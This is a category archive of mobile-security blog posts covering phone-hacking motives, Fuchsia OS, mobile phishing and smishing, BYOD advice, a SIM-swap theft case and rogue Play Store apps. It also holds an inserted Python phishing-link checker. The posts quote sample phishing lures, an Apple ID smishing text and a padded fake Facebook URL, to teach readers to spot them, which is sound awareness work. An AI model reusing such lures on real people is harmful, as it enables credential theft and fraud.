Category Archives: Mobile

All the reasons why cybercriminals want to hack your phone

When people think of hacking, most imagine desktop computers, laptops, or perhaps even security cameras. However, in recent years, cybercriminals have expanded their repertoire to include smartphones, too. Here are 10 reasons why they may be looking to hack your phone.

1. To infect it with malware

Many smartphone users assume they can stay safe from malware and other threats by installing antivirus apps on their phones and being extra careful about the websites they visit. They typically don’t expect their phones to have malware out of the box. However, researchers showed that’s what happened with more than three dozen Android models, typically from lesser-known brands.

The phones had Trojan malware installed on them before they reached users, and the culprit appeared to be a software vendor in Shanghai that was a shared reseller for a brand of antivirus software. Although it’s not clear what the hackers wanted to do after infecting the phones, the malware was particularly hard to remove. Often, it involved fully reinstalling the operating system.

2. To eavesdrop on calls

People use their phones to speak to loved ones, discuss business plans, talk about their travels—all manner of personal, intimate content. So, it’s not surprising that criminals would want to break in and listen, whether to case a target or simply for voyeuristic pleasure. But how do they do it?

There’s a flaw in the US cellular exchange network involving SS7, the signaling protocol carriers use to route calls and texts between networks. Once an attacker knows a target’s phone number, the SS7 weakness lets them listen to calls, read texts, and see the user’s location. Even though US agencies know about the issue, they haven’t taken decisive action to fix it, leaving Americans’ phone privacy at risk.

3. To steal money

Ransomware attacks cause headaches for computer users by making the affected machines lock up or holding files hostage until people pay the ransom to restore access. Even then, paying doesn’t guarantee a return to proper functionality. Ransomware doesn’t only affect computers, though. There’s a recent trend of mobile ransomware, which often originates from malicious, third-party apps.

In one example, a third-party app promised to optimize the Android system but actually tricked people into transferring $1,000 from their PayPal accounts. The login process was legitimate, so it wasn’t a phishing attempt. However, once people logged in, a Trojan automated the PayPal transfer.

4. To blackmail people

The crime of blackmail isn’t new, but threat actors recognize that the small computer in people’s pockets and purses likely has more personal information stored in it than a desktop or laptop. And they are able to first cut people off from accessing their phones before then threatening to leak the information they find.

Criminals may start the hack after obtaining some personal information about a victim that is available on the black market due to a previous, unrelated breach. They then use that information to contact the victim’s phone company and pose as the user, saying that they want to transfer the number to a new phone. Phone companies often provide such services and can automatically transfer information, including phone numbers, to a new device. The trouble is that in this case, the old phone still works as hardware but, with its number moved to the criminal’s device, it’s useless to the person who owns it.

After hackers take over a phone in this way, the stage is set for more serious crimes—blackmail among them. If a person had essential numbers in their phone not backed up elsewhere, they could easily feel pressured to cave into hackers’ demands to avoid worse consequences.

5. To damage your phone

Hackers feel they’ve accomplished a goal by causing chaos for victims. One way to do that is to make the phone overheat and ultimately ruin it. Security researchers warned that hackers could break into a phone’s processor and use it for mining cryptocurrency. In addition to making the phone slow down, it can also cause the phone to get too hot or even blow up!

There are many reliable cooling devices used in cell phones for temperature management, even “intelligent” temperature management solutions that heat up your phone’s battery when it’s too cool and cool it down when it’s too hot. However, if hackers have their way, even those normally sufficient internal components could fail to keep the device cool enough.

One type of cryptomining malware, called Loapi, is often hidden in apps that appear as downloadable games. Security researchers ran a test and found it actually made a phone battery bulge due to excessive heat after only two days.

6. To threaten national security

Countless analysts have chimed in to say that President Trump’s alleged use of insecure mobile devices could help foreign adversaries glean information about the United States that could threaten the nation or at least give information about the president’s intended actions.

In 2018, Billy Long, a Republican congressman, had his mobile phone and Twitter account hacked. Cybercriminals know that one of the primary ways politicians interact with followers is through social media.

Besides threatening national security more directly, these hackers could erode the trust politicians have built with their audiences, especially with fake posts that seem to come from the genuine account owners.

Cybercriminals know that by hacking the mobile phones and social media accounts of politicians, they are contributing to the overall public opinion that politicians cannot be trusted. Instead of looking to the source for information, users might instead look for news via sources that are even less reliable or strategically crafted to spread fake news.

7. For fun or notoriety

Some hackers get a thrill by successfully pulling off their attacks. Hacking is a source of entertainment for them, as well as an ego boost. If money isn’t the primary motivator for cybercriminals, then notoriety might be a close second. Hackers may get into phones because it’s a newer challenge that might require more cutting-edge malware development techniques. Ultimately, many cybercriminals want approval from others in the industry and desire their respect.

8. To get payment information

E-wallets, which store payment information inside smartphone apps so people don’t have to carry real credit or debit cards, are convenient. However, their rising popularity has given hackers another reason to target phones.

Often, cybercriminals entice people to download fake mobile payment apps (of course believing they are real). Then, once people enter their payment information, hackers have the information needed to charge transactions to the cards.

9. Because so many people use it

Since hackers want their attacks to have significant payoffs, they know they can up their chances of having a major impact by targeting smartphones. Information published by the Pew Research Center shows 95 percent of Americans own smartphones. To put that in perspective, only 35 percent of the population did in 2011, when the organization first conducted a survey on smartphone ownership.

Also, different research from another organization reveals that mobile Internet usage is overtaking desktop time. People are becoming increasingly comfortable with using their smartphones to go online, browse, and even shop. As such, no matter what kind of hack cybercriminals orchestrate, they can find plenty of victims by focusing on smartphone users.

10. Because it’s an easy target

Research shows that mobile apps have rampant security problems. This gives criminals ample opportunity to infiltrate insecure apps rather than the phones themselves.

In one case, about 40 of the top 50 shopping apps had at least a few high-level security vulnerabilities that allowed hackers to see personal information or deceive users by luring them to dangerous apps that were copies of the originals.

Further research about problematic dating apps found that many of them give third parties access to unencrypted data through vulnerable software development kits (SDKs). Hackers know some apps achieve hundreds of thousands, or even millions, of downloads. If they can break into them, they’ll get fast access to the phones that have those apps installed and the people who use them.

How to stay protected

These examples show that hackers have a myriad of reasons to hack phones and even more ways to make it happen. One easy way to protect against attacks is to avoid third-party app stores and only download content from the phone’s legitimate app stores, such as Google Play or iTunes. However, threat actors can penetrate those platforms, too, and many an infected or rogue app has made its way through.

It’s also smart to keep tabs on phone statistics, such as battery life and the number of running apps. If those deviate too much from the norm, that’s a sign hackers may be up to no good in the background.

Running a mobile antivirus scan at least monthly, or installing an always-on cybersecurity program is another good strategy, but only if the application comes from a trustworthy source, such as the vendor’s official site.

Instead of being overeager to download new apps, people should ideally exercise caution and only do so if numerous sources of feedback indicate they are free from major security flaws. Some app development companies are in such a hurry to get to the market with their latest offerings that they do not make security a priority.

Besides these more specific tips, it’s essential for people to be highly aware of how they interact with their phones. For example, strange pop-ups or redirects in a phone’s browser, or random icons appearing without having downloaded a new app could indicate problems, and individuals should not assume that everything’s okay. When in doubt, it’s best to stop using the phone and get some answers—before hackers learn all they need to know about you.

The post All the reasons why cybercriminals want to hack your phone appeared first on Malwarebytes Labs.

Mobile Menace Monday: Is Fuchsia OS the end of Android?

It’s no secret that every year Google announces a new Android version. This time though, recent Google documents state that the next major Android version will be Android Q and not Android 9.1 Pie.

In parallel, Google is also developing an operating system called Fuchsia that’s supposedly going to replace Android in the near future. People were expecting to see a statement from Google about Fuchsia, or Andromeda (its previous codename), back in October 2017. But that never happened. Instead, we get to speculate for another year about whether or not it’s here to replace Android, or is simply a playground for developers. Here’s what we know so far.

A brief history of Google Fuchsia

Fuchsia is a capability-based operating system with a user interface, and it has the ability to scale up to larger devices like laptops and computers. It can also support ARM, MIPS, and x86 processors.

It first popped up on GitHub in August 2016 with zero fanfare or explanation from Google. Unlike Android and Chrome OS, Google Fuchsia is not based on Linux, but rather Google’s own new microkernel.

In May 2017, an experimental OS leaked. However, calling it an “OS” might be a misnomer. Basically, its system UI was up and running on top of Android and functioning like an app, but nothing else worked. Later, one of the developers working on the project teased that this was not just a dumping ground but a real project. This led to speculation that Google had larger plans for it.

Not long after, at the beginning of 2018, Google released news that the Fuchsia team picked the Chrome OS-powered Google Pixelbook as a supported device. A couple of curious users rushed out to test this claim. They confirmed that they were able to run Fuchsia on these Google Pixelbooks. This was one more big step forward. Since then, we’ve heard nothing more. However, we do know the components of Fuchsia, and they look promising.

The Fuchsia layer cake

Let’s take a closer look under the hood of this potential future Google OS. There are four distinct layers that hold the whole operating system together. Google uses a layer cake model when describing the organization of Fuchsia code, and we will not deviate from this scheme. So, let’s talk about each layer separately and in detail.

Zircon

It all starts with Zircon (formerly Magenta), the Fuchsia Operating System’s new microkernel, which is based on LK (Little Kernel), a small operating system intended for embedded devices. Zircon is the foundation on which the rest of the Fuchsia house is built, and it primarily handles access to hardware and communication between software.

Garnet

The next layer, which sits atop Zircon, is called Garnet. Garnet consists of services needed for the OS, such as its network and graphics, together with the package manager and device drivers. Some of them are worth mentioning here: Escher, a Vulkan-based graphics renderer with specific support for volumetric soft shadows; Amber, Fuchsia’s update system; and Xi Editor, a modern editor with a backend written in Rust.

Peridot

The next layer up, Peridot, mostly handles Fuchsia’s modular runtime, the app design model in which applications are composed from smaller parts. What this means is that almost everything that exists in Fuchsia, such as software and even system files, is delivered in packages. And Fuchsia packages can be made up of smaller components instead of large, all-in-one programs. One of the major components of Peridot is Ledger. Ledger is a storage system for Fuchsia, and it provides and manages separate data stores for apps/components across devices, syncing everything through a cloud provider.

Topaz

Topaz is the top layer and the one you’ll most likely interact with. It’s similar to Android’s pre-installed (factory) applications like messaging, contacts, phone, camera, and music. The most important part is the introduction of Flutter support. Flutter is a software development kit allowing cross-platform development for Fuchsia, Android, and iOS. Flutter produces apps based on Dart, an open-source, scalable programming language with robust libraries and runtimes for building web, server, and mobile apps. Because the Flutter software development kit is cross-platform, users are able to install parts of Fuchsia on Android devices.

In addition, Google already announced Flutter 1.0 is out. The first stable release of Google’s UI toolkit for creating native experiences for iOS and Android from a single codebase is available at https://flutter.io.

Final thoughts

Let’s sum it up. Here’s what we know so far:

  • Google Fuchsia is a new OS in development from Google, but is still a ways off from completion.
  • The OS is based on the Zircon kernel, which makes it highly scalable and secure.
  • Flutter, a software development kit offering cross-platform opportunities, is already out.

Although Google said Fuchsia is just “one of many experimental open-source projects” at the company, we can already see a potential OS brewing that could replace Android. Microsoft once tried to create something similar with the code name Singularity, but they totally failed. That’s why there’s a big question mark over whether Fuchsia will actually replace Android and Chrome OS, or peter out like some of its predecessors.

Also, let’s remember that Android was hanging around for about five years before it launched in a real product. If Fuchsia follows a similar path, and everything goes well, maybe we can expect a consumer product sometime around 2020. Right now, it’s still a giant maybe. So if you’re feeling stressed about learning a new OS, there is still plenty of time to adjust—save the panicking for later in 2019.

The post Mobile Menace Monday: Is Fuchsia OS the end of Android? appeared first on Malwarebytes Labs.

Android Malware Steals from PayPal Accounts

What happens when you combine a remotely controlled banking Trojan with an abuse of Android Accessibility services? According to new research from ESET, you get an Android Trojan that steals money from

The post Android Malware Steals from PayPal Accounts appeared first on The Cyber Security Place.

Something else is phishy: How to detect phishing attempts on mobile

In a report published in 2011, IBM revealed that mobile users are three times more likely to fall for phishing scams compared to desktop users. This claim was based on accessed log files found on Web servers used to host websites involved in phishing campaigns.

Almost a decade later, we continue to see different organizations reporting an increased trend in phishing attacks targeting the mobile market. Surprisingly, phishers seem to have tipped the scales to a new preferred target: iPhone users. Wandera, a mobile security solutions provider, has observed that iOS users experience twice as many phishing attacks compared to their Android counterparts.

Mobile phishing by the numbers

Below is a quick rundown of current noteworthy mobile phishing statistics to date:

  • In the whitepaper “Mobile phishing 2018: Myths and facts facing every modern enterprise today” (PDF), Lookout has determined that the rate at which users are tapping phishing links has grown an average of 85% since 2011.
  • In the latest “Phishing Activity Trend Report” (PDF), the Anti-Phishing Working Group (APWG) has revealed that the Payments industry continues to rank as the top targeted sector by phishing threat actors (36%) in Q1 2018.
  • This same APWG report also claims that 35% of all phishing sites were using HTTPS and SSL certificates.

    With Google now labeling non-HTTPS websites as “Not Secure,” expect to see more phishers abuse the accepted notion that HTTPS sites are trustworthy and legitimate.

  • In their report, “2018 State of Phish”, Wombat Security hailed smishing, short for SMS phishing, as the attack vector to watch. This is due to its increased media reporting in 2017, which they believe will continue to trend, especially in countries with low awareness of mobile phishing.
  • PhishLabs stated in its “2018 Phishing Trends & Intelligence Report” (PDF) that Email/Online Services is the top targeted industry in the second half of 2017 (26.1%), with a high concentration of phishing URLs mimicking Microsoft Office 365 login pages. This suggests that there is an increasing trend of phishing campaigns targeting businesses.
  • This same PhishLabs report has also noted a dramatic increase of phishing campaigns banking on the trust of users towards software-as-a-service (SaaS) companies (7.1%). Such attacks are said to be non-existent before 2015 but have more than doubled in two succeeding years.
  • Wandera stated that 48% of phishing attacks happen on mobile. They also claim that iOS users are 18X more likely to fall for a phish than to download malware.

Mobile phishing scam types

Phishing attacks are no longer exclusive to emails, especially on mobile. A mobile device’s inherent design and features have given phishers new ways to get into users’ heads and get their hands on vital personal and business data.

While many users are quite familiar with what phishing looks like on the desktop, these same users are not as familiar with smishing or vishing—and other types of phish one might encounter on the mobile—as they are with email phishing.

SMiShing

SMiShing is phishing done through SMS. Android expert and Senior Analyst Nathan Collier has written about a smishing message a colleague received on their Android device that purportedly originated from a human resources company, promoting an open, albeit fake, position of Prime Agent for Amazon.

iOS users also have their share of spotted smishing campaigns. Below is a smishing message posted publicly on Reddit as a warning to other iPhone users:

Screenshot of an iOS SMS phishing message. Courtesy of Redditor u/jamesmt87.

Your Apple ID has been disabled until we hear from you ,
Prevent this by confirming your informations at {bit.ly URL}
Apple inc

Vishing

Vishing, or voice-mail phishing (at times, it also stands for VoIP phishing), is phishing done with the use of a device’s call feature. An attempt can be considered vishing if the potential phisher (1) leaves a recorded message to the target that something is wrong, (2) leaves a number that the target can use to call back, or (3) cold calls the target. Point two is precisely the tactic used by an iOS phishing scam that Ars Technica Editor Sean Gallagher revealed in a July 2018 post. According to Gallagher, an email directs users to a fake Apple website, which pops up a dialog box to start a call to a purported agent that goes by “Lance Roger at AppleCare.” AppleCare is Apple’s extended warranty service.

A vishing pop-up dialog box. Courtesy of Ars Technica.

In Android’s corner, we have the latest variant of Fakebank, a mobile Trojan that is capable of intercepting bank SMS and inbound and outgoing calls. A user, for example, making a call to a legitimate bank gets redirected to scammers who are posing as agents working for the bank. Security researchers have spotted this variant in affected apps geared towards Korean bank clients.

Vishing can also be a part of a greater business email compromise (BEC) attack.

Other types: messenger phishing, social phishing, and ad-network phishing

Apps continue to shape a user’s mobile experience for the better. Without them, one may likely just consider their phones as a pricey paperweight.

These brilliant little programs have made it possible for users to both access their personal and work emails while away from a desktop computer, keep in touch with family and friends via messaging platforms while on the go, share and access media in real-time, and stave off boredom while waiting.

Phishers, unfortunately, have leveraged the power of apps to their advantage. And the internet is rife with stories of people who got (or nearly got) phished via mobile apps.

Take, for instance, the Facebook message that used Messenger as a launchpad to spread a purported “viral video” of the recipient complete with their picture and name, and a number indicating the view count.

Screenshot of a Facebook Messenger phish. Courtesy of Security For Real People.

Clicking this “video” sent mobile users to a fake Facebook Videos login screen, wherein they were then encouraged to key in their Facebook credentials. Doing so sent a similar video bait to contacts, not to mention scammers hijacking the accounts of those who fell for this trick.

This is a case of messenger phishing. It is a type of phishing attempt that uses messaging services on mobile devices. Examples of these services are WhatsApp, Instagram, Viber, Skype, Snapchat, and Slack.

Then there’s social phishing, which is an attempt that abuses social networking sites to spread a phishing campaign. Below is a capture of a phishing message sent to a recipient via LinkedIn’s InMail feature:

Screenshot of a LinkedIn InMail phish. Courtesy of KnowBe4.

Here’s another case of social phishing: A Twitter account posing as NatWest bank inserted itself into a live conversation between a NatWest bank client and NatWest’s official Twitter channel in an attempt to present a bogus quick fix to the current concern the real bank was attempting to address.

Malwarebytes has caught a fake NatWest Twitter account red-handed.

Finally, ad-network phishing. On mobile, ads can come in many forms: They can be in free apps, on web pages the user visits, and as a pop-up notification or banner. Because apps communicate with other services (like an ad network) in the background, they can potentially expose mobile users to risks like a phishing campaign (at best) or malware (at worst).

We’d be remiss if we didn’t mention phishing apps. These are fake apps that bank on the names of popular online brands, usually promising one or more perks if downloaded and installed. Such is the case of multiple fake Instagram apps that were pulled from the Google Play store after being found to collect credentials. These apps had been downloaded 1.5 million times, and they promised to boost follower count, post likes, and comments.

Mobile phish spotting

Mobile phishing attempts are quite a challenge to detect, more so for the uninitiated and the unacquainted. Regardless of your level of know-how or your computing platform of choice, as a rule of thumb, it is always best to familiarize yourself with common phishing tactics and trends. We already have a great and very comprehensive list of red flags that can guide you in determining phishing attempts in general. However, mobile users can significantly benefit from our listing of tell-tale signs of potential mobile phishing attempts (below) just as well:

  • The message comes out of the blue, claiming that you either (1) won a prize, (2) have an account or subscribed service suddenly deactivated (often without disclosing a reason), or (3) there is a very urgent need for you to do something to address a problem. Such claims are tried-and-tested social engineering ploys that more often than not give the game away.

    When a notification is genuine, however, and warns of an actual breach for which steps must be taken to mitigate its effects, it is still best for users to avoid clicking links in the notification (which we agree is faster and more convenient) in favor of going directly to the legitimate domain (either by loading it from a bookmark or manually typing the address in the address bar) and logging in from there.

  • The message comes from an unknown number or sender. And if it claims to be from a service you actually use, be doubly cautious. As it’s near impossible to determine on mobile if the service provider is who they say they really are, you might be better off verifying any claims for yourself, just like in the above point, and checking for logged suspicious activities. If you’re still a bit bothered, contact your service provider’s customer support department.
  • The message comes with a bogus hyperlink, which may be obvious to some but not to others. It pays to be very familiar with URLs of official web addresses of services you use online. If you feel or think that something is off, even if you’re unsure what is triggering this, err on the side of caution and avoid clicking that link.
  • The message comes with a shortened URL. Shortening URLs is an excellent method to make effective use of space that has a limited character count. Unfortunately, this can be abused to mask potentially malicious URLs from being detected at first glance.
  • If the message or caller asks for personal information, if not more information, from you. A majority of legitimate and reputable businesses don’t call or send messages asking for sensitive information. In some cases, banks do call if they suspect potential fraud activity with your account. They do this to check that you are who you say you are. However, there are certain pieces of information they will never ask you to divulge, such as your account PIN or Social Security Number (SSN).
  • If the message or caller doesn’t address you by your name. Again, a majority of businesses know who their clients are and will always address you by your name.
  • If the URL you get directed to doesn’t have a green padlock. Yes, having HTTPS on a website is no longer a solid proof that one is not on a malicious page, but there are still a lot of phishing campaigns out there that forgo using HTTPS.
  • If the URL you get redirected to appears to be right, but also has unexplained dashes after it. Phishers are already using a technique called URL padding, wherein they pad the subdomain, which consists of a legitimate website address, with hyphens to hide the real domain and create believability.

    Screenshot of a fake Facebook login screen where phishers used URL padding. Courtesy of PhishLabs.

    In this example, the complete URL is hxxp://m.facebook.com----------------validate----step1.rickytaylk[dot]com/sign_in.html, where rickytaylk[dot]com is the domain and m.facebook.com----------------validate----step1 is the long subdomain. Users would likely find it difficult to view the complete URL given the mobile’s small screen size, but what they can do is copy the URL and paste it into a notepad app. From there, users can scrutinize the URL more effectively.

A word on homograph attacks: Yes, they work on mobile devices, too. Fortunately, many modern internet browsers are already programmed to display the Punycode version of domains that contain confusables (non-English characters that visually appear similar to one or more Latin letters).

Users seeing a Punycode URL on their mobile browser could be alerted that they’re on a page they’re not supposed to be on. And this is a good thing. However, not all apps that accept and display text have considered the possibility of homograph attacks. According to Wandera’s research, many communications and collaboration tools used by employees on both Android and iOS don’t flag Punycode URLs as suspicious.

“Only Facebook Messenger, Instagram and Skype provided an opportunity for the user to identify the punycode URL by either showing a preview of the webpage with the xn prefix, or, in the case of skype, by not providing a hyperlink for domains using unicode, meaning users can’t click through from the message,” writes Liarna La Porta, Content Marketing Manager for Wandera, in a blog post. “While these apps are not providing the best methods of defense, they at least provide an opportunity to assess suspicious links more closely.”
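The URL-padding and Punycode red flags described above can be checked mechanically before a link is tapped. The following is an added example, not code from the Malwarebytes post or from Wandera: a small link inspector that splits a URL into its real (registrable) domain and subdomain, flags hyphen-padded subdomains that carry a watched brand name, renders xn-- labels as Unicode so a reviewer can see the lookalike characters, and notes shortened and non-HTTPS links. The brand list, shortener list, sample URLs, and the two-label rule for the registrable domain are all assumptions made for the example (a production checker would consult the Public Suffix List); the first sample mirrors the PhishLabs padding example quoted in the post, with hxxp written as http so the parser accepts it.

```python
from urllib.parse import urlsplit

# Constructed sample URLs for the example (not live sites). The first mirrors the
# URL-padding example quoted in the post; the Punycode one is a constructed lookalike.
SAMPLE_URLS = [
    "http://m.facebook.com----------------validate----step1.rickytaylk.com/sign_in.html",
    "https://m.facebook.com/login.php",
    "http://xn--pple-43d.com/verify",
    "https://bit.ly/abc123",
    "http://secure-login.example.net/apple/id",
]

# Assumptions for the example: brands named in the post, and a short list of
# well-known shorteners. A deployment would maintain its own watch lists.
WATCHED_BRANDS = ("facebook", "apple", "paypal", "amazon", "microsoft")
SHORTENERS = ("bit.ly", "t.co", "goo.gl", "tinyurl.com")
PADDING_HYPHENS = 4  # threshold for calling a subdomain "padded" (assumption)


def registrable_domain(host):
    """Last two labels of the host. Simplification: no Public Suffix List, so
    hosts under co.uk and similar would need a real PSL lookup in production."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def decode_punycode_host(host):
    """Render xn-- labels as Unicode so the confusable characters are visible."""
    try:
        return host.encode("ascii").decode("idna")
    except (UnicodeError, ValueError):
        return host


def inspect_url(url):
    """Return the host, its registrable domain, and a list of red-flag findings."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if not host:
        return {"host": host, "registrable_domain": "", "findings": ["unparseable URL"]}

    real = registrable_domain(host)
    # Everything left of the registrable domain is attacker-controlled naming.
    subdomain = host[: -len(real)].rstrip(".") if host != real else ""
    findings = []

    # URL padding: a long run of hyphens hides the real domain off-screen on mobile.
    hyphens = subdomain.count("-")
    if hyphens >= PADDING_HYPHENS:
        findings.append("padded subdomain (%d hyphens)" % hyphens)

    # Brand name present only in the subdomain, never in the real domain.
    for brand in WATCHED_BRANDS:
        if brand in subdomain and brand not in real:
            findings.append("brand '%s' only in subdomain; real domain is %s" % (brand, real))

    # Homograph lookalikes show up as xn-- labels once the host is in ASCII form.
    if any(label.startswith("xn--") for label in host.split(".")):
        findings.append("punycode host, decodes to %s" % decode_punycode_host(host))

    if real in SHORTENERS:
        findings.append("shortened URL, destination hidden")
    if parts.scheme != "https":
        findings.append("not HTTPS")

    return {"host": host, "registrable_domain": real, "findings": findings}


if __name__ == "__main__":
    for sample in SAMPLE_URLS:
        result = inspect_url(sample)
        status = "; ".join(result["findings"]) or "no red flags"
        print("%s -> real domain %s: %s" % (sample, result["registrable_domain"], status))
```

Run as a script it prints one line per sample. The point of separating the registrable domain from the subdomain is the same advice the post gives for the notepad trick: whatever appears to the left of the real domain is chosen by whoever registered that domain, so a brand name there proves nothing.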

Phish-proof no more?

In April of 2017, a Lithuanian man who posed as Quanta Computer, a Taiwanese electronics manufacturing company, successfully conned two big names in the tech industry, each paying him over $100M. These companies eventually got the bulk of their money back, but not after making headlines that made readers gasp. Who were these phishing victims? They’re Google and Facebook.

When it comes to how likely a target is to fall for a phishing lure, it appears that tech savviness is slowly becoming a non-factor. It is challenging enough for desktop users to recognize a believable phish. With mobile devices, which already have a size limitation and more potential attack points, users are doubly challenged, especially if the adversary is motivated enough to steal the sensitive corporate data stored in them.

Indeed, phishing has branched beyond email. And using commodity-level phishing protection on mobile is inadequate in defending users from attacks. Being truly phish-proof (or akin to it) may require necessary adjustments on the side of both man and machine: improved security features on mobile devices and their apps, and knowing the red flags and what steps to take to adequately respond to a phishing attempt are key.

Recommended reading:

  • “Phishing attacks on modern Android” (direct PDF link here)
  • “Social Phishing” (direct PDF link here)


The post Something else is phishy: How to detect phishing attempts on mobile appeared first on Malwarebytes Labs.

Top Ten Tips for Securing Your Mobile Devices

Do you have employees who bring mobile phones to work and use those devices on the corporate network? Do they store company data on these “Bring Your Own Devices” (BYOD)? Does your company have a policy in place for this?

First, the moment a person brings their personal phone to work, a fusion of personal and business tasks occurs. And, equally as bad, company-issued devices are used for personal purposes as much as, if not more than, the employees’ own devices. Not sure you believe this? Here are some stats:

A recent survey asked 2,000 office workers about their habit of using their personal mobile devices at work. Here’s what it found:

  • 73% of people admit to downloading personal apps to tablets they got from their company.
  • 62% of people admit to downloading personal apps to mobile phones they got from their company.
  • 45% of people admit to downloading personal apps to notebooks they got from their company.
  • The people who were most likely to do this were in the 25 to 38-year-old age group.
  • 90% of people use their personal mobile devices to conduct business for work.

As you can see, a lot of people are using their mobile devices on the job, and this could not only put your company data at risk, but also the data associated with your clients. Do you have a plan to minimize or even totally prevent how much sensitive company data is wide open to hackers?

Solutions to Keep Sensitive Business Information Safe

Decision makers and business owners should always consider their personal devices as equal to any business device. You definitely don’t want your sensitive company information out there, and this information is often contained on your personal mobile or laptop device. Here are some things that you can do to keep this information safe:

Give Your Staff Information About Phishing Scams

Phishing is a method that cybercriminals use to steal data from companies. Studies show that it is extremely easy for even the smartest employees to fall for these tricks. Here’s how they work: a staff member gets an email with a sense of urgency. Inside the email is a link. The body of the email encourages the reader to click the link. When they do, they are taken to a website that either installs a virus onto the network or tricks the employee into giving out important company information.

Inform Your Staff that the Bad Guys Might Pose as Someone They Know

Even if you tell your staff about phishing, they can still get tricked into clicking an email link. How? Because the bad guys make these emails really convincing. Hackers do their research, and they are often skilled in the principles of influence and the psychology of persuasion. So, they can easily create fake emails that look like they come from your CEO or a vendor, someone your staff trusts. With this in mind, it might be best to create a policy where employees are no longer allowed to click email links. Pick up the phone to confirm that whatever an email is requesting is legitimate and that the person who sent it is who they claim to be.

Teach Employees that Freebies aren’t Always Goodies

A lot of hackers use the promise of something free to get clicks. Make sure your staff knows to never click on an email link promising a freebie of any kind.

Don’t Buy Apps from Third-Party Sources

Apps are quite popular, and there are many that can help to boost productivity in a business setting. However, Apple devices that are “jailbroken” or Android devices that are “rooted” are outside of the walled garden of their respective stores and susceptible to malicious viruses. Make sure your employees know that they should never buy an app from a third-party source. Only use the official Apple App Store or the Google Play Store.

Always Protect Devices

It’s also important that you advise your employees to keep their devices protected with a password. These devices are easy to steal since they are so small. If there is no password, there is nothing stopping a bad guy from getting into them and accessing all of the accounts that are currently logged into the device.

Install a Wipe Function on All Mobile Devices Used for Business

You should also require all employees to have a “wipe” function on their phones. Even if they are only doing something simple, like checking their work email on their personal mobile device, it could get into the wrong hands. With the “wipe” function, the entire phone can be cleared remotely. You should also require employees to use the setting that erases the phone after a set number of password attempts.

Require that All Mobile Devices on the Company Network Use Anti-Virus Software

It’s also important, especially in the case of Android devices, that all mobile devices on the network have some type of anti-virus software.

Do Not Allow Any Jailbroken Devices on Your Company’s Network

Jailbroken devices are much more vulnerable to viruses and other malware. So, never allow an employee with a jailbroken phone to connect to your network.

All Employees Should Activate Update Alerts

One of the easiest ways to keep mobile devices safe is to keep them updated. So, make sure that all employees have update alerts enabled, and make sure that they are updating their devices when prompted or automatically.

Teach Employees About the Dangers of Public Wi-Fi

Finally, make sure your staff knows the dangers of using public Wi-Fi. Public Wi-Fi connections are not secure, so when connected, your devices are pretty open. That means, if you are doing things that are sensitive, such as logging into company accounting records, a hacker can easily follow. Instead, urge employees to use a VPN. These services are inexpensive and they encrypt data so hackers can’t access it.

Robert Siciliano is a Security and Identity Theft Expert. He is the founder of Safr.me (http://www.safr.me), a cybersecurity speaking and consulting firm based in Massachusetts. See him discussing internet and wireless security on Good Morning America.

Security Affairs: Hacker stole $1m from Silicon Valley executive via SIM swap

Nicholas Truglia, a 21-year-old man from New York, has stolen $1 million from a Silicon Valley executive via SIM swap, and targeted other individuals.

Nicholas Truglia, a 21-year-old man from New York, has been accused of stealing $1 million from a Silicon Valley executive via SIM swap. He gained access to the executive’s phone number and used it to impersonate him and steal $500,000 from two accounts he had at Coinbase and Gemini.

The hack and consequent cyber heist occurred on October 26 and Truglia was arrested on November 14.

The man is suspected to have scammed more than six executives in the Bay Area.

“San Francisco resident Robert Ross, a father of two, noticed his phone suddenly lose its signal on Oct. 26. Confused, he went to a nearby Apple store and later contacted his service provider, AT&T. But he wasn’t quick enough to stop a hacker from draining $500,000 from two separate accounts he had at Coinbase and Gemini, according to Santa Clara officials.” reads a CNBC report.

“Nicholas Truglia, 21, lifted the $1 million from Ross’ two cryptocurrency accounts, according to a felony complaint filed this month in California state court.”

The man has been charged with a total of 21 crimes, including identity theft, fraud, embezzlement, and attempted grand theft against other targets, although his attempts to rob them ultimately failed.

Police raided Truglia’s house under a warrant and were able to recover $300,000 worth of cryptocurrency from his hardware wallet. At the time of writing, there is no news about the remaining amount of money stolen by the man.

“It’s a whole new wave of crime,” said Erin West, the deputy district attorney of Santa Clara County. “It’s a new way of stealing of money: They target people that they believe to have cryptocurrency,” she told CNBC.

SIM swap fraud is a type of fraud that defeats the additional security measures introduced by banks to protect customer transactions. Basically, cybercriminals are able to transfer cash from a victim’s account by intercepting one-time PIN codes and SMS notifications sent to the victim’s phone number.

The attacker impersonates the victim and asks the mobile provider’s tech support staff to reassign the victim’s phone number to a SIM card owned by the crook. The procedure requires the attacker to answer a few security questions meant to verify the victim’s identity; typically the attacker gathers the information needed to answer them through social engineering or OSINT activities.

According to the court documents, Truglia also targeted Saswata Basu, the CEO of blockchain storage service 0Chain; Myles Danielson, a hedge-fund executive; and Gabrielle Katsnelson, co-founder of start-up SMBX.

Pierluigi Paganini

(Security Affairs – SIM swap, hacking)

The post Hacker stole $1m from Silicon Valley executive via SIM swap appeared first on Security Affairs.



Security Affairs: 13 fraudulent apps into Google Play have been downloaded 560,000+ times

A malware researcher discovered 13 fraudulent apps in Google Play that had already been downloaded and installed more than 560,000 times.

Malware researcher Lukas Stefanko from security firm ESET discovered 13 malicious apps in Google Play that had already been downloaded and installed over half a million times (560,000+).

The malicious apps could allow attackers to install another app and trick the user into giving the permissions necessary for the installation.

All the malicious apps, posing as games, were published by the same developer, named Luis O Pinto; at the time, they had a low detection rate.

The cybercriminals aim to monetize their efforts by pushing unsolicited advertisements to the user when they unlock the device.

Once installed, the malicious apps immediately remove their icon from the display and download other malicious apps in the background.

The applications were all downloaded from a hardcoded address.

In order to trick users into giving permissions to install the downloaded app, the malicious apps attempt to make the user believe that the installation failed and restarted, asking users to approve the action again.

Stefanko reported that the downloaded APK was Game Center; once installed and executed, it hides itself and starts displaying ads.

The expert pointed out that Game Center requests permissions for full network access, to view network and Wi-Fi connections, and to run at startup.

The malicious apps do not implement any specific features of their own; they only work as simple downloaders, which is what lets them pass Google Play security checks.

Stefanko confirmed that Game Center is no longer available at the link hardcoded in the malicious apps. After being informed of the fraudulent applications, Google removed them from Google Play.
